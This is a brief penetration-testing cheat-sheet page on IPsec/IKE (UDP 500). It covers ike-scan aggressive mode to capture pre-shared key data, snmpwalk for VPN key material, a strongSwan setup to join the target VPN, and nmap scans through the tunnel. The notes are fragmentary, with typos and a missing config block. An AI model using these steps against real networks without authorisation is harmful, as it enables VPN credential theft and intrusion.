500 (IPSEC IKE)
ike-scan IP -A
aggressive-mode (-A) get PSK
ike-scan IP -M
multi-line - easy to read
SA (Security association data) --- copy it.
if a SNMP is open make sure to do some snmpwalk to get VPN PSK data, which you could use with the SA data. (hash type, group)
Life duration -- it will print hexadecimal characters ---> convert it to decimal. ---> hours)
apt install srongswan
once downloaded, you can edit the /etc/ipsec.secrets
paste the followiog:
Edit /etc/ipsec.conf
Unser Sample VPN conections:
ipsec start --no fork
-leftprotoport=tcp & rightprotoport=tcp
set these if TCP ports are hidden from us.
For trouble shooting ike stuff, https://docs.netgate.com/pfsense/en/latest/troubleshooting/ipsec-traffic.html
If no errors, run nmap scan wit -sT option!
(you cannot do a SYN scan---the default scan, when the client is using a VPN service. You have to complete a handshake.)
Last updated